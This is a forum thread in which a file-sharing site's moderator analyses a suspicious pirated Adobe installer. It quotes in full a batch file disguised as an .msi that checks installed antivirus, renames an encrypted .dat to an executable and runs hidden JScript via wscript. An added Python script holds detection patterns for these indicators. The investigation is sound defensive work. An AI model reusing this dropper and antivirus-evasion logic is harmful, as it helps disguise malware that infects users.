*.msi file gets renamed to *.bat, *.js file hijacks wscript?

June 27, 2020 at 03:10:42
Specs: Windows 10
Hi! I'm a moderator on a site where people can upload and share programs. We are trying to keep our site clean of malicious infections in the apps, but some of the programs that are being uploaded by one user receive feedback about infections. I'm a bit worried by this uploader. He uploads many good programs, but he gets some complaints from users who download his apps. They explain that abnormal things happen after installing these apps on their systems. So I've downloaded some of his apps to analyze them in Hybrid Analysis, and I see strange activities.

I downloaded one of his programs which in this case is Adobe collection, I scanned the Set-up.exe with Hybrid-Analysis: https://www.hybrid-analysis.com/sam...

I noticed this: https://i.ibb.co/t2Dfzhp/bscr.png

Then I tried to find ADC_version.msi; I changed the file extension to ADC_version.bat and opened the bat file on Linux.

June 27, 2020 at 03:12:36
When I opened ADC_version.bat I got this code:

@echo off
cd ../../products
setlocal enableDelayedExpansion enableextensions
set LIST=
for /f "delims=" %%F in ('wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName') do set LIST=!LIST! %%F

set "regexp=.*kasper.*"

echo( %LIST%|findstr /i /r /c:"%regexp%" >nul && (

move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
start ../Set-up.exe

echo " "

) || (

echo " "
cd ../
move Set-up.exe products/AdobePhotoshop21-Core_x64.data
timeout 1 nul 2>&1
cd packages/ADC
if exist ADC (
cd ../../products
move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
timeout 1 nul 2>&1
start ../Set-up.exe
cd ../packages/ADC
start wscript //E:jscript ADC %1
) else (
echo "Error : Please Extract compressed file first ..."

rename ADC_version.bat ADC_version.msi
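
A static triage of the batch file quoted above, as an added example that is not part of this thread: it flags the indicators the post describes (the WMI SecurityCenter2 antivirus enumeration, the vendor-name branch, the .dat-to-.exe rename and the wscript //E:jscript launch) so a moderator can check an upload without running it. The rule names and the reduced SAMPLE_BAT excerpt are constructed for this example.

```python
import re

# Constructed sample: the key lines of the renamed "ADC_version.msi" batch
# file quoted in the post above, reduced to the parts the triage inspects.
SAMPLE_BAT = r"""@echo off
for /f "delims=" %%F in ('wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName') do set LIST=!LIST! %%F
set "regexp=.*kasper.*"
echo( %LIST%|findstr /i /r /c:"%regexp%" >nul && (
move AdobePhotoshop21-Core_x64.dat ../Set-up.exe
start ../Set-up.exe
) || (
start wscript //E:jscript ADC %1
)
"""

# Each rule: (name, regex applied per line, why it matters to a defender)
RULES = [
    ("av_enumeration",
     r"wmic\b.*SecurityCenter2.*AntiVirusProduct",
     "queries installed antivirus products via WMI SecurityCenter2"),
    ("av_vendor_branch",
     r'findstr\s+/i\s+/r\s+/c:"%regexp%"|set\s+"regexp=[^"]*"',
     "branches on an AV vendor name matched against the WMI output"),
    ("jscript_via_wscript",
     r"wscript(\.exe)?\s+//E:jscript\s+\S+",
     "runs an extensionless file as JScript through wscript"),
    ("extension_masquerade",
     r"move\s+\S+\.dat\S*\s+\S+\.exe",
     "renames a .dat payload to .exe before launching it"),
]

def triage_batch(text):
    """Return {rule_name: [matching lines]} for every rule that fires."""
    findings = {}
    for line in text.splitlines():
        for name, pattern, _ in RULES:
            if re.search(pattern, line, re.IGNORECASE):
                findings.setdefault(name, []).append(line.strip())
    return findings

def av_vendor_pattern(text):
    """Extract the vendor regex the script compares the AV list against."""
    m = re.search(r'set\s+"regexp=([^"]*)"', text, re.IGNORECASE)
    return m.group(1) if m else None

if __name__ == "__main__":
    for name, lines in triage_batch(SAMPLE_BAT).items():
        why = next(r[2] for r in RULES if r[0] == name)
        print(f"[{name}] {why}")
        for matched in lines:
            print("   ", matched)
    print("AV vendor the script checks for:", av_vendor_pattern(SAMPLE_BAT))
```

Run it against the full extracted .bat text instead of SAMPLE_BAT; any rule firing is a reason to hold the upload for review rather than proof of malice on its own.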

June 27, 2020 at 04:26:57
I must admit this is as far as my skill set goes...

The AdobePhotoshop21-Core_x64.dat is a 5.22 MB file that's encrypted no matter what programs I use to open it. I noticed the ADC file running through wscript in the batch script.

Some of the members on our site have complained about this JavaScript (ADC) file hijacking wscript and running spyware/a keylogger or something malicious. So I was able to find the ADC file, but when I opened it, it was all unreadable, compressed, so I copied the text into an online decompressor (https://www.generateit.net/javascript-decompressor/). It got readable but is still encrypted, a user on this site told me.

Here is the decompressed ADC file: https://pastebin.com/sTjecBHE

I'm not expecting someone to go through that code; I'm just looking for some guidance on how to continue the investigation to get some proof to ban this user PERMANENTLY (if it's a malicious act).

Help from this community will be very much appreciated by me and all of the members on our site. Thank you

June 27, 2020 at 19:41:59
It is clear from the Hybrid-Analysis that there is a malicious attempt in the setup.
Is it not possible to run that scan on your web site after a user uploads the app? Maybe we add the analysis result for others to see and decide?

June 28, 2020 at 08:59:20
@sluc thanks for your view. I've compared different setups of the same Adobe versions, and this one does show other results than the others, including this renaming of the file extension (msi to bat), and this ADC.js code possibly hijacks wscript, running its JS code in the background. I have analysed this for weeks, asking around, but I haven't found anyone yet who could determine if this ADC.js file has malicious intent or not. It's a pretty long code and possibly encrypted, so that's why. My skills stop at this JS script and that's why I need help with it.

